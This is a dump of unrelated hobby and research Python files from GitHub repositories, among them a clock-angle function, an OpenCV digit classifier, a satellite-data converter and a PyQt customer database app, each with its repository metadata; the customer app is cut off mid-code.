electrode[2, :], 'g-',label='voltage')\nplt.ylim(ymax = 110, ymin = -45)\nplt.subplot(4, 1, 4)\nplt.plot(t, electrode[3, :], 'g-',label='voltage')\nplt.ylim(ymax = 110, ymin = -45)\n#plt.plot(t, 0.0 - electrode[0, :] - 0.5*electrode[1, :]+ np.random.normal(-0.1, 0.1, 9).dot(electrode[2:11, :]), 'b-',label='voltage')\n#plt.plot(t, 0.0 - electrode[0, :] + 0.5*abs(np.random.normal(0, 0.1, 100)).dot(electrode[1:101, :]), 'b-',label='voltage')\n\nplt.show()","repo_name":"leonidfedorov/ephysim","sub_path":"HH.py","file_name":"HH.py","file_ext":"py","file_size_in_byte":7791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"34933016396","text":"STEP_1 = False # step 1\nSHOWN_ONCE = False # disables welcome message after being shown once\nwhile True:\n while True:\n if not SHOWN_ONCE:\n print(' ')\n print(\"Welcome to: Do I Need To Fix My Lamp.\\n Please put yes or no: \")\n SHOWN_ONCE = True\n WORKING = input(\"Does your Lamp work? (Y/N): \")\n WORKING = WORKING.capitalize()\n if WORKING == 'Y':\n print(\"Great! Lamp is working.\")\n exit()\n if WORKING == \"N\":\n break\n else:\n print(\"Please put Y or N\")\n while True:\n PLUG = input(\"Is it plugged in? (Y/N): \")\n PLUG = PLUG.capitalize()\n if PLUG == 'N':\n print(\"Plug it in.\")\n STEP_1 = True\n break\n if PLUG == 'Y':\n break\n else:\n print(\"Please put Y or N\")\n if STEP_1:\n STEP_1 = False\n continue\n while True:\n BULB = input(\"Is bulb burned out? (Y/N): \")\n BULB = BULB.capitalize()\n if BULB == 'N':\n print(\"Repair Lamp.\")\n break\n if BULB == 'Y':\n BULB = True\n print(\"Replace your bulb.\")\n break\n else:\n print(\"Please put Y or N\")\n","repo_name":"TheRandomOwl/RandomPythonScripts","sub_path":"Lamp.py","file_name":"Lamp.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"434035404","text":"#You are given the following information, but you may prefer to do some research for yourself.\n#\n# 1 Jan 1900 was a Monday.\n#\n# Thirty days has September,\n# April, June and November.\n# All the rest have thirty-one,\n# Saving February alone,\n# Which has twenty-eight, rain or shine.\n# And on leap years, twenty-nine.\n# A leap year occurs on any year evenly divisible by 4, but not on a century unless it is divisible by 400.\n# \n# How many Sundays fell on the first of the month during the twentieth century (1 Jan 1901 to 31 Dec 2000)?\n\n# I'm thinking of the days encoded as Z mod 7 as follows:\n# 0\tsunday\n# 1\tmonday\n# 2 \ttuesday\n# 3\twednesday\n# 4\tthursday\n# 5 \tfriday\n# 6 \tsaturday\n\ndef get_day(date, month, year):\n day = 0 # We're starting with the fact that get_day(1,1,1900) = 1. We'll get 0 from the year 1900, 0 from the month january, and 1 from the date the 1st. \n # Year\n day = (day + (year-1900)+(year-1900)//4)%7 \t# 365%7=1, so we add 1 for every year since 1900. Every 4 years has a leap day, and by subtracting 1900 we conveniently leave out 1900 (which is not a leap year). \n # Month\n if month > 1:\n day += 31\n if month > 2:\n day += 28 \n if year%4 == 0:\n day += 1 #then it's a leap year\n if year%100 == 0:\n day -= 1 #actually is isn't\n if year%400 == 0:\n day += 1 #actually it is\n if month > 3:\n day += 31\n if month > 4:\n day += 30\n if month > 5:\n day += 31\n if month > 6:\n day += 30\n if month > 7:\n day += 31\n if month > 8:\n day += 31\n if month > 9:\n day += 30\n if month > 10:\n day += 31\n if month > 11:\n day += 30\n # Day\n day = (day + date) % 7\n return day\n\n# Now we count sundays which fall on the 1st:\n\ncount=0\n\nfor iyear in range(1900, 2001):\n for imonth in range(1,13):\n count += 1 if get_day(1,imonth,iyear) == 0 else 0\n if get_day(1,imonth,iyear) == 0:\n print(\"1-\" + str(imonth) + \"-\" + str(iyear))\n\nprint(count)\n","repo_name":"TrevorKlar/project_euler","sub_path":"problem19.py","file_name":"problem19.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"9407474591","text":"from django.urls import path\nfrom .api_views import api_list_customers, api_show_customers, api_list_salesperson, api_show_salesperson, api_list_salesrecords, api_show_salesrecords\n\nurlpatterns = [\n path(\"customers/\", api_list_customers, name=\"api_create_customers\"),\n path(\"customers//\", api_show_customers, name=\"api_show_customers\"),\n path(\"salespersons/\", api_list_salesperson, name=\"api_create_salesperson\"),\n path(\"salespersons//\", api_show_salesperson, name=\"api_show_salesperson\"),\n path(\"salesrecords/\", api_list_salesrecords, name=\"api_create_salesrecords\"),\n path(\"salesrecords//\", api_show_salesrecords, name=\"api_show_salesrecords\"),\n]","repo_name":"joki4127/CarCar","sub_path":"sales/api/sales_rest/api_urls.py","file_name":"api_urls.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"17855215247","text":"import cv2\r\nimport numpy as np\r\n\r\ndigits=cv2.imread(\"digits.png\",cv2.IMREAD_GRAYSCALE)\r\ntest_digits=cv2.imread(\"test_digits.png\",cv2.IMREAD_GRAYSCALE)\r\n\r\ntest_digits=np.vsplit(test_digits,50)\r\n\r\n#test digits \r\ntest_cells=[]\r\nfor d in test_digits:\r\n d=d.flatten()\r\n test_cells.append(d)\r\ntest_cells=np.array(test_cells,dtype=np.float32)\r\nrows=np.vsplit(digits,50)\r\n\r\n\r\n#putiing all the elements in the array(50x50=2500 digits)\r\ncells=[]\r\n\r\nfor row in rows:\r\n elem=np.hsplit(row,50)\r\n for i in elem:\r\n i=i.flatten()\r\n cells.append(i)\r\n\r\n#convert to np array \r\ncells=np.array(cells,dtype=np.float32)\r\n\r\n#made to specify the first 250 are zeros and the next 250 are ones and so on\r\nk=np.arange(10)\r\ncells_labels=np.repeat(k,250)\r\n \r\n# loading KNN(K Nearest Neighbour Algo)\r\n\r\nknn=cv2.ml.KNearest_create()\r\nknn.train(cells,cv2.ml.ROW_SAMPLE,cells_labels)\r\n\r\nret,result,neighbours,dist=knn.findNearest(test_cells,k=3)\r\n\r\n#K value is then nbr of nearest neighbours that we need to find\r\n# K can be any 'odd' value\r\n\r\nprint(result)\r\n\r\n\r\n","repo_name":"moadmmh/Awesome-OpenCV","sub_path":"Hand_Written_digits_recognition/Knn_digits.py","file_name":"Knn_digits.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"5"} +{"seq_id":"38122444400","text":"# create function, that accepts hour and minute and returns angle between hour hand and minute hand \n\ndef calc_angle(hour: int, minute: int) -> int:\n if (hour < 0 or hour > 12) or not isinstance(hour, int):\n print(\"hour must be integer number between 0 and 12\")\n return -1\n if (minute < 0 or minute > 60) or not isinstance(minute, int):\n print(\"minute must be integer number between 0 and 60\")\n return -1\n if hour == 12:\n hour = 0\n if minute == 60:\n minute = 60\n \n minute_angle = 360 / 60 * minute\n int_hour_angle = 360 / 12 * hour\n fract_hour_angle = 360 / 12 / 60 * minute\n hour_angle = int_hour_angle + fract_hour_angle\n angle_between_hour_and_minute = abs(minute_angle - hour_angle)\n \n return int(angle_between_hour_and_minute)\n\n","repo_name":"itpen-bala/tasks","sub_path":"calculate_angle_between_hands_of_clock/calculate_angle_between_hands_of_clock.py","file_name":"calculate_angle_between_hands_of_clock.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37722301512","text":"import argparse\nfrom datetime import datetime, time, timezone\nfrom os import environ\nfrom pathlib import Path\n\nimport h5py\nimport numpy as np\nimport xarray as xr\nfrom pyspex.lib.tmtc_def import tmtc_dtype\nfrom pyspex.lv1_gse import LV1gse\nfrom pyspex.lv1_io import L1Aio\nfrom pyspex.tif_io import TIFio\nfrom pyspex.version import pyspex_version\n\n# - global parameters ------------------------------\nEPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)\n\n\n# - local functions --------------------------------\ndef get_table_id(ckd_dir, bin_table_name):\n \"\"\"Quick en dirty implementation to obtain table_id from binning-table CKD.\"\"\"\n if not Path(ckd_dir).is_dir():\n ckd_dir = environ.get('CKD_DIR', '.')\n\n # only read the latest version of the binning-table CKD\n bin_tables = sorted(list(Path(ckd_dir).glob('SPX1_OCAL_L1A_TBL_*.nc')))\n if not bin_tables:\n raise FileNotFoundError('No binning table found')\n\n table_id = None\n with h5py.File(bin_tables[-1], 'r') as fid:\n for grp in [x for x in fid if x.startswith('Table')]:\n gid = fid[grp]\n if 'origin' not in gid.attrs:\n continue\n\n if gid.attrs['origin'].decode('ascii') == bin_table_name:\n table_id = int(grp.split('_')[1])\n break\n\n return table_id\n\n\ndef get_stimulus(hdr):\n \"\"\"Return stimulus data as a xarray::Dataset.\"\"\"\n if 'Spectral data stimulus' not in hdr:\n return None\n\n ds_dict = hdr['Spectral data stimulus']\n xr_wv = xr.DataArray(ds_dict['Wavelength (nm)'],\n coords=[ds_dict['Wavelength (nm)']],\n dims=['wavelength'],\n attrs={'long_name': 'wavelength of stimulus',\n 'units': 'nm'})\n\n data = ds_dict['Radiance (photons/(s.nm.m^2.sr)']\n data *= 2.99792458 * 6.62607015e-14 / ds_dict['Wavelength (nm)']\n xr_sign = xr.DataArray(data, dims=['wavelength'],\n coords=[ds_dict['Wavelength (nm)']],\n attrs={'long_name': 'signal of stimulus',\n 'units': 'W.m-2.sr-1.um-1'})\n\n return xr.Dataset({'wavelength': xr_wv, 'signal': xr_sign})\n\n\ndef get_l1a_name(msm_id: str, utc_sensing_start: datetime) -> str:\n \"\"\"\n Return name of SPEXone product for DEM measurements.\n\n Parameters\n ----------\n msm_id : string, optional\n Provide identifier for measurement, OCAL only\n utc_sensing_start: datetime\n Provide sensing start of first measurement in L1A product\n\n Notes\n -----\n L1A file name format:\n SPX1_OCAL_[_YYYYMMDDTHHMMSS]_L1A_vvvvvvv.nc\n where\n msm_id is the measurement identifier\n YYYYMMDDTHHMMSS is time stamp of the first image in the file\n vvvvvvv is the git-hash string of the pyspex repository\n \"\"\"\n # define string of sensing start as yyyymmddThhmmss\n sensing_start = utc_sensing_start.strftime('%Y%m%dT%H%M%S')\n\n return (f'SPX1_OCAL_{msm_id}_{sensing_start}'\n f'_L1A_{pyspex_version(githash=True)}.nc')\n\n\n# - main function ----------------------------------\ndef main():\n \"\"\"Create a L1A calibration product from data in Tiff format.\n\n Environment\n -----------\n CKD_DIR : directory with SPEXone CKD, default is CWD\n \"\"\"\n parser = argparse.ArgumentParser(\n description='create SPEXone L1A product from instrument simulations')\n parser.add_argument('--lineskip', default=False, action='store_true',\n help='read line-skip data, when available')\n parser.add_argument('--output', default=None,\n help='define output directory, default=CWD')\n inp_grp = parser.add_argument_group('inp_grp', 'process inp_tif files')\n inp_grp.add_argument('--inp_tif', default=False, action='store_true',\n help='use TIFF file with 32-bit image')\n inp_grp.add_argument('--nframe', default=None, type=int,\n help='specify the number of images to be generated')\n parser.add_argument('--verbose', default=False, action='store_true',\n help='be verbose')\n parser.add_argument('ascii_file', default=None,\n help=('provide path to SPEXone instrument simulator'\n ' product with extension \".dat\"'))\n args = parser.parse_args()\n if args.verbose:\n print(args)\n\n if not Path(args.ascii_file).is_file():\n raise FileNotFoundError(f'File {args.ascii_file} does not exist')\n\n if not args.inp_tif and args.nframe is not None:\n raise RuntimeError('option --nframe works only with \"--inp_tif\"')\n\n tif = TIFio(args.ascii_file, inp_tif=args.inp_tif, lineskip=args.lineskip)\n hdr = tif.header()\n tags = tif.tags()[0]\n images = tif.images(n_frame=args.nframe)\n if args.verbose:\n for key, value in hdr.items():\n if key == 'Spectral data stimulus':\n continue\n print(f\"{key:s}: '{value}'\")\n\n # For now, we obtain the reference time from the TIFF.tags\n utc_start = None\n msm_id = hdr['OCAL measurement']\n for key in tags:\n if key.name == 'datetime':\n str_date, str_time = tags[key.value].split(' ')\n utc_start = datetime.fromisoformat(\n str_date.replace(':', '-') + 'T' + str_time + '+00:00')\n break\n\n prod_name = get_l1a_name(msm_id, utc_start)\n if args.inp_tif:\n prod_name = prod_name.replace('_L1A_', '_inp_L1A_')\n if args.output is not None:\n dest_dir = Path(args.output)\n if not dest_dir.is_dir():\n dest_dir.mkdir()\n prod_name = str(dest_dir / prod_name)\n if args.verbose:\n print(prod_name)\n\n # define dimensions for L1A product\n if args.inp_tif:\n if images.ndim == 2:\n n_images = 1\n n_samples = images.size\n else:\n n_images = images.shape[0]\n n_samples = images.shape[1] * images.shape[2]\n else:\n n_images = int(hdr['Number of measurements'])\n if args.lineskip:\n n_samples = (int(hdr['Enabled lines'])\n * int(hdr['Column dimension']))\n else:\n n_samples = (int(hdr['Row dimension'])\n * int(hdr['Column dimension']))\n\n dims = {'number_of_images': n_images,\n 'samples_per_image': n_samples,\n 'hk_packets': n_images,\n 'viewing_angles': int(hdr['Number of viewing angles'])}\n\n # define binning table ID\n if n_samples == 0x400000:\n table_id = 0\n elif n_samples == 0x100000:\n table_id = 1\n else:\n if args.lineskip:\n table_id = get_table_id('/nfs/SPEXone/share/ckd',\n hdr['Line-enable-array'])\n else:\n table_id = get_table_id('/nfs/SPEXone/share/ckd',\n hdr['Flexible binning table'])\n\n # Compute delta_time for each frame (seconds)\n # convert timestamps to seconds per day\n offs = (utc_start - EPOCH).total_seconds()\n intg_time = int(hdr['Co-additions']) * float(hdr['Exposure time (s)'])\n secnds = (1 + np.arange(n_images, dtype=float)) * intg_time\n img_sec = (offs + secnds // 1).astype('u4')\n img_subsec = np.round((secnds % 1) * 2**16).astype('u2')\n img_time = secnds\n\n nom_hk = np.zeros(n_images, dtype=tmtc_dtype(0x320))\n sci_hk = np.zeros(n_images, dtype=tmtc_dtype(0x350))\n if table_id == 0:\n sci_hk['REG_FULL_FRAME'] = 1\n sci_hk['REG_CMV_OUTPUTMODE'] = 3\n else:\n sci_hk['REG_FULL_FRAME'] = 2\n sci_hk['REG_CMV_OUTPUTMODE'] = 1\n sci_hk['REG_BINNING_TABLE_START'] = 0x400000 * (table_id + 1) + 0x80000000\n sci_hk['DET_OFFSET'] = 16384 - 70\n sci_hk['DET_FOTLEN'] = 20\n sci_hk['DET_EXPTIME'] = \\\n int(1e7 * float(hdr['Exposure time (s)']) / 129 - 0.43 * 20)\n sci_hk['REG_NCOADDFRAMES'] = int(hdr['Co-additions'])\n\n # Generate L1A product\n ref_date = datetime.combine(\n utc_start.date(), time(0), timezone.utc)\n with L1Aio(prod_name, dims=dims, ref_date=ref_date) as l1a:\n # write image data, detector telemetry and image attributes\n l1a.fill_science(images.reshape(n_images, -1),\n sci_hk, np.arange(n_images))\n\n l1a.set_dset('/image_attributes/icu_time_sec', img_sec)\n l1a.set_attr('valid_min', np.uint32(1577800000),\n ds_name='/image_attributes/icu_time_sec')\n l1a.set_attr('valid_max', np.uint32(1735700000),\n ds_name='/image_attributes/icu_time_sec')\n l1a.set_attr('units', 'seconds since 1970-01-01 00:00:00',\n ds_name='/image_attributes/icu_time_sec')\n l1a.set_dset('/image_attributes/icu_time_subsec', img_subsec)\n l1a.set_dset('/image_attributes/image_time', img_time)\n\n # Engineering data\n l1a.fill_nomhk(nom_hk)\n l1a.set_dset('/engineering_data/HK_tlm_time', img_time)\n\n # Global attributes\n l1a.fill_global_attrs(inflight=False)\n l1a.set_attr('input_files', [Path(args.ascii_file).name])\n\n with LV1gse(prod_name) as gse:\n gse.set_attr('origin', hdr['history'])\n gse.set_attr('comment', hdr['OCAL measurement'])\n if 'Light source' in hdr:\n gse.set_attr('light_source', hdr['Light source'])\n if 'Detector illumination' in hdr:\n gse.set_attr('Light_source', hdr['Detector illumination'])\n gse.set_attr('Illumination_level',\n float(hdr['Detect. illumination e/ms']))\n if 'Detector temperature (K)' in hdr:\n gse.set_attr('Detector_temperature',\n float(hdr['Detector temperature (K)']))\n if 'Detector temperature (K)' in hdr:\n gse.set_attr('Optics_temperature',\n float(hdr['Optics temperature (K)']))\n if 'Illuminated viewing angle' in hdr:\n vp_dict = {'0': 1, '1': 2, '2': 16, '3': 8, '4': 4}\n gse.write_viewport(vp_dict.get(hdr['Illuminated viewing angle']))\n else:\n gse.write_viewport(0)\n if 'Illuminated field ACT' in hdr:\n gse.write_attr_act(float(hdr['Rotation stage ACT angle']),\n float(hdr['Illuminated field ACT']))\n else:\n gse.write_attr_act(float(hdr['Rotation stage ACT angle']))\n if 'Illuminated field ALT' in hdr:\n gse.write_attr_alt(float(hdr['Rotation stage ALT angle']),\n float(hdr['Illuminated field ALT']))\n else:\n gse.write_attr_alt(float(hdr['Rotation stage ALT angle']))\n if 'DoLP input' in hdr:\n gse.write_attr_polarization(float(hdr['AoLP input (deg)']),\n float(hdr['DoLP input']))\n if 'Spectral data stimulus' in hdr \\\n and 'Illuminated viewing angle' in hdr:\n gse.write_data_stimulus(get_stimulus(hdr))\n\n\n# --------------------------------------------------\nif __name__ == '__main__':\n main()\n","repo_name":"rmvanhees/pyspex","sub_path":"scripts/spx1_tif2l1a.py","file_name":"spx1_tif2l1a.py","file_ext":"py","file_size_in_byte":11141,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"73356768793","text":"import heapq\r\nfrom sqlitedict import SqliteDict\r\ndef dijkstra(adj, source, target):\r\n keys=[]\r\n for key in adj:\r\n keys.append(key)\r\n print(keys)\r\n INF = ((1<<63) - 1)//2\r\n pred = { x:x for x in adj }\r\n dist = { x:INF for x in adj }\r\n dist[source] = 0\r\n PQ = []\r\n heapq.heappush(PQ, [source,dist[source]])\r\n\r\n while(PQ):\r\n u = heapq.heappop(PQ) # u is a tuple [u_dist, u_id]\r\n u_dist = u[1]\r\n u_id = u[0]\r\n if u_dist == dist[u_id]:\r\n #if u_id == target:\r\n # break\r\n print(adj[u_id])\r\n for v in adj[u_id]:\r\n print(v in keys)\r\n if v in keys:\r\n v_id = v[0]\r\n w_uv = v[1]\r\n if dist[u_id] + w_uv < dist[v_id]:\r\n dist[v_id] = dist[u_id] + w_uv\r\n heapq.heappush(PQ, [v_id, dist[v_id]])\r\n pred[v_id] = u_id\r\n \r\n if dist[target]==INF:\r\n print(\"There is no path between \" + source + \" and \" + target)\r\n else:\r\n st = []\r\n node = target\r\n while(True):\r\n st.append(str(node))\r\n if(node==pred[node]):\r\n break\r\n node = pred[node]\r\n path = st[::-1]\r\n print(\"The shortest path is: \" + \" \".join(path))\r\nadj=SqliteDict(\"simplewikitest.sqlite\")\r\n'''for i in adj.keys():\r\n print(str(i))'''\r\ndijkstra(adj,\"anarchy\",\"nation\")","repo_name":"yashobam/dijkstra","sub_path":"dijkstra.py","file_name":"dijkstra.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"16612964989","text":"# -*- coding: utf-8 -*-\n\"\"\"Coroutine as_completed.\"\"\"\nimport asyncio\nfrom collections.abc import AsyncGenerator\nfrom functools import partial\nimport typing\nfrom typing import Any\n\nDEFAULT_CAPACITY = 32\n\n\nasync def as_completed(agen: typing.AsyncGenerator, capacity=DEFAULT_CAPACITY) -> typing.AsyncGenerator:\n \"\"\"Coroutine as_completed.\n\n Receive completed tasks as they are done.\n \"\"\"\n async for item in Waiter(agen, capacity=capacity):\n yield item\n\n\nclass Waiter(AsyncGenerator):\n \"\"\"Waiter.\"\"\"\n\n def __init__(self, agen: typing.AsyncGenerator, *, capacity=DEFAULT_CAPACITY):\n \"\"\"Init Waiter.\"\"\"\n self.agen = agen\n self.counter = asyncio.Queue(maxsize=capacity)\n self.queue_out = asyncio.Queue()\n self.tasks = dict()\n\n def __aiter__(self):\n \"\"\"Async iter method.\"\"\"\n consume_task = asyncio.current_task()\n produce_task = asyncio.create_task(self.produce())\n cancel_callback = partial(Waiter.stop_consuming, consume_task)\n produce_task.add_done_callback(cancel_callback)\n return self\n\n async def __anext__(self):\n \"\"\"Async next method.\"\"\"\n item = await self.queue_out.get()\n self.queue_out.task_done()\n return item\n\n @staticmethod\n def stop_consuming(consume_task: asyncio.Task, task_done):\n try:\n consume_task.get_coro().throw(StopAsyncIteration)\n except StopIteration:\n pass\n\n async def produce(self):\n \"\"\"Produce method.\"\"\"\n async for item in self.agen:\n await self.counter.put(0)\n self.launch_task(item)\n await self.counter.join()\n await self.queue_out.join()\n\n def launch_task(self, aw: typing.Awaitable):\n task: asyncio.Task = asyncio.create_task(aw)\n task.add_done_callback(self.done_task)\n self.register_task(task)\n\n def register_task(self, task: asyncio.Task):\n task_name = task.get_name()\n self.tasks[task_name] = task\n\n def unregister_task(self, task: asyncio.Task):\n task_name = task.get_name()\n self.tasks.pop(task_name)\n\n def done_task(self, task_done):\n self.counter.get_nowait()\n self.queue_out.put_nowait(task_done)\n self.unregister_task(task_done)\n self.counter.task_done()\n\n def asend(self, value) -> typing.Awaitable:\n \"\"\"Asend method.\"\"\"\n\n def athrow(self, typ: typing.Type[BaseException], val: typing.Optional[BaseException] = ...,\n tb: Any = ...) -> typing.Awaitable:\n \"\"\"Athrow method.\"\"\"\n\n def aclose(self) -> typing.Awaitable:\n \"\"\"Aclose method.\"\"\"\n","repo_name":"andribas404/probable-doodle","sub_path":"probable_doodle/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"14574660716","text":"def find_minimum(arr):\n length = len(arr)\n for x in range(len(arr) - length + 1):\n a, b, c = arr[x], arr[x + 1], arr[x + 2]\n if a < b and a < c:\n return a\n if b < a and b < c:\n return b\n else:\n return c\n\n\ndef minimum_of_three(arr):\n result = []\n for x in arr:\n result.append(find_minimum(x))\n output = ' '.join(list(map(str, result)))\n return output\n","repo_name":"myusko/algosproblems","sub_path":"algos/arrays/minimum_of_three.py","file_name":"minimum_of_three.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"39562608715","text":"#importing required packages\nimport sys,sqlite3,time\nfrom PyQt5 import QtGui\nfrom PyQt5.QtGui import QTextCursor\nfrom PyQt5.QtWidgets import QTableWidgetItem,QTableWidget,QComboBox,QVBoxLayout,QGridLayout,QDialog,QWidget, QPushButton, QApplication, QMainWindow,QAction,QMessageBox,QLabel,QTextEdit,QProgressBar,QLineEdit\nfrom PyQt5.QtCore import QCoreApplication\n\n#defining class to handle database queries\nclass DBHelper():\n def __init__(self):\n self.conn = sqlite3.connect(\"cdms.db\")\n self.c = self.conn.cursor()\n #initializing database tables if they do not exist already\n self.c.execute(\"CREATE TABLE IF NOT EXISTS customers(cid INTEGER,name TEXT,gender INTEGER,storeid INTEGER,age INTEGER,address TEXT,mobile INTEGER)\")\n self.c.execute(\"CREATE TABLE IF NOT EXISTS transactions(reciept_no INTEGER,cid INTEGER,fee INTEGER,storeid INTEGER,reciept_date TEXT, payment_type INTEGER, eid INTEGER)\")\n self.c.execute(\"CREATE TABLE IF NOT EXISTS stores(storeid INTEGER,name TEXT)\")\n self.c.execute(\"CREATE TABLE IF NOT EXISTS employees(eid INTEGER,name TEXT, mobile INTEGER)\")\n self.c.execute(\"CREATE TABLE IF NOT EXISTS directory(id INTEGER,name TEXT, mobile INTEGER)\")\n #method for adding customer to database\n def addCustomer(self, cid, name, gender, storeid, age, address, mobile):\n try:\n self.c.execute(\"INSERT INTO customers (cid,name,gender,storeid,age,address,mobile) VALUES (?,?,?,?,?,?,?)\", (cid, name, gender, storeid, age, address, mobile))\n self.conn.commit()\n self.c.close()\n self.conn.close()\n QMessageBox.information(QMessageBox(), 'Successful', 'Customer is added successfully to the database.')\n #exception error\n except Exception:\n QMessageBox.warning(QMessageBox(), 'Error', 'Could not add customer to the database.')\n #method for adding transaction to database\n def addTransaction(self,cid,fee,storeid,payment_type, eid):\n reciept_no=int(time.time())\n date=time.strftime(\"%b %d %Y %H:%M:%S\")\n try:\n self.c.execute(\"INSERT INTO transactions (reciept_no,cid,fee,storeid,reciept_date,payment_type,eid) VALUES (?,?,?,?,?,?,?)\",(reciept_no, cid, fee, storeid, date, payment_type, eid))\n self.conn.commit()\n self.c.close()\n self.conn.close()\n QMessageBox.information(QMessageBox(), 'Successful','Transaction is added successfully to the database.\\nReference ID=' + str(reciept_no))\n #exception error\n except Exception:\n QMessageBox.warning(QMessageBox(), 'Error', 'Could not add transaction to the database.')\n #method to search for customer using a cid number and the results are returned to the function showCustomer() which then analyzes the list\n def searchCustomer(self, cid):\n self.c.execute(\"SELECT * from customers WHERE cid=\" + str(cid))\n self.data = self.c.fetchone()\n #if there is no data returned by above cursor function fetchone() then it means there is no record holding the cid number, so a warning box displayed and returned from the function\n if not self.data:\n QMessageBox.warning(QMessageBox(), 'Error', 'Could not find any customer with cid no ' + str(cid))\n return None\n self.list = []\n #add query results into list form\n for i in range(0, 7):\n self.list.append(self.data[i])\n self.c.close()\n self.conn.close()\n #calls on function that takes the list and displays the output in tabular form to the user\n showCustomer(self.list)\n #method to search transactions based on cid number\n def searchTransaction(self,cid):\n #initialize text string to hold transaction query results\n text=''\n self.c.execute(\"SELECT * from transactions WHERE cid=\"+str(cid)+\" ORDER BY reciept_no DESC\")\n self.data=self.c.fetchall()\n #error returned if there are no transactions for given cid\n if not self.data:\n QMessageBox.warning(QMessageBox(), 'Error', 'Could not find any transactions for customer with cid: '+str(cid))\n return None\n #add query results to text string\n for row in self.data:\n text+=str(row)+\"\\n\"\n self.c.close()\n self.conn.close()\n #passes text string to function to display results to the user\n showTransactionFunction(text)\n\n\n#function to display results for customer given the query results passed in list form\ndef showCustomer(list):\n #initialize attributes\n cid = 0\n gender = \"\"\n storeid = \"\"\n age = \"\"\n name = \"\"\n address = \"\"\n mobile = -1\n #defining values from list\n cid = list[0]\n name = list[1]\n\n if list[2] == 0:\n gender = \"Male\"\n else:\n gender = \"Female\"\n\n if list[3] == 0:\n storeid = \"Store 0\"\n elif list[3] == 1:\n storeid = \"Store 1\"\n elif list[3] == 2:\n storeid = \"Store 2\"\n elif list[3] == 3:\n storeid = \"Store 3\"\n elif list[3] == 4:\n storeid = \"Store 4\"\n elif list[3] == 5:\n storeid = \"Store 5\"\n\n age = list[4]\n address = list[5]\n mobile = list[6]\n\n #creating a PyQt table and passing in the labels,values in x,y grid form\n table = QTableWidget()\n table.setWindowTitle(\"Customer Details\")\n #setting table dimensions\n table.setRowCount(7)\n table.setColumnCount(2)\n #adding labels, values as widget items in x,y form\n table.setItem(0, 0, QTableWidgetItem(\"Cid\"))\n table.setItem(0, 1, QTableWidgetItem(str(cid)))\n table.setItem(1, 0, QTableWidgetItem(\"Name\"))\n table.setItem(1, 1, QTableWidgetItem(str(name)))\n table.setItem(2, 0, QTableWidgetItem(\"Gender\"))\n table.setItem(2, 1, QTableWidgetItem(str(gender)))\n table.setItem(3, 0, QTableWidgetItem(\"Store Id\"))\n table.setItem(3, 1, QTableWidgetItem(str(storeid)))\n table.setItem(4, 0, QTableWidgetItem(\"Age\"))\n table.setItem(4, 1, QTableWidgetItem(str(age)))\n table.setItem(5, 0, QTableWidgetItem(\"Address\"))\n table.setItem(5, 1, QTableWidgetItem(str(address)))\n table.setItem(6, 0, QTableWidgetItem(\"Mobile\"))\n table.setItem(6, 1, QTableWidgetItem(str(mobile)))\n table.horizontalHeader().setStretchLastSection(True)\n table.show()\n #initilize dialog box and add table widget\n dialog = QDialog()\n dialog.setWindowTitle(\"Customer Details\")\n dialog.resize(500, 300)\n dialog.setLayout(QVBoxLayout())\n dialog.layout().addWidget(table)\n dialog.exec()\n\n#function to display the transactions for the text string of query results passed in\ndef showTransactionFunction(text):\n #initializing a QTextEdit widget item to hold the text string\n logOutput = QTextEdit()\n logOutput.setReadOnly(True)\n logOutput.setLineWrapMode(QTextEdit.NoWrap)\n font = logOutput.font()\n font.setFamily(\"Courier\")\n font.setPointSize(10)\n logOutput.moveCursor(QTextCursor.End)\n logOutput.setCurrentFont(font)\n logOutput.setTextColor(QtGui.QColor(\"black\"))\n logOutput.insertPlainText(text)\n sb = logOutput.verticalScrollBar()\n sb.setValue(sb.maximum())\n #initializing dialog box and adding the logOutput widget\n dialog = QDialog()\n dialog.setWindowTitle(\"Customer Transactions\")\n dialog.resize(500, 300)\n dialog.setLayout(QVBoxLayout())\n dialog.layout().addWidget(logOutput)\n dialog.exec()\n\n\n#creating a class which inherits QDialog to create the entry form of adding a new customer to the database\nclass AddCustomer(QDialog):\n def __init__(self):\n super().__init__()\n\n #general attributes\n self.gender=-1\n self.storeid=-1\n self.age=-1\n self.cid=-1\n self.name=\"\"\n self.address=\"\"\n self.mobile=-1\n\n #initilialzing buttons for cancel, reset and add\n self.btnCancel=QPushButton(\"Cancel\",self)\n self.btnReset=QPushButton(\"Reset\",self)\n self.btnAdd=QPushButton(\"Add\",self)\n self.btnCancel.setFixedHeight(30)\n self.btnReset.setFixedHeight(30)\n self.btnAdd.setFixedHeight(30)\n\n #creating QComboBox items for dropdown selection of categorical variables\n self.genderCombo = QComboBox(self)\n self.genderCombo.addItem(\"Male\")\n self.genderCombo.addItem(\"Female\")\n\n self.storeidCombo = QComboBox(self)\n self.storeidCombo.addItem(\"Store 0\")\n self.storeidCombo.addItem(\"Store 1\")\n self.storeidCombo.addItem(\"Store 2\")\n self.storeidCombo.addItem(\"Store 3\")\n self.storeidCombo.addItem(\"Store 4\")\n self.storeidCombo.addItem(\"Store 5\")\n\n #creating QLabel items for the variables to be entered/selected\n self.cidLabel=QLabel(\"Cid No\")\n self.nameLabel=QLabel(\"Name\")\n self.addressLabel = 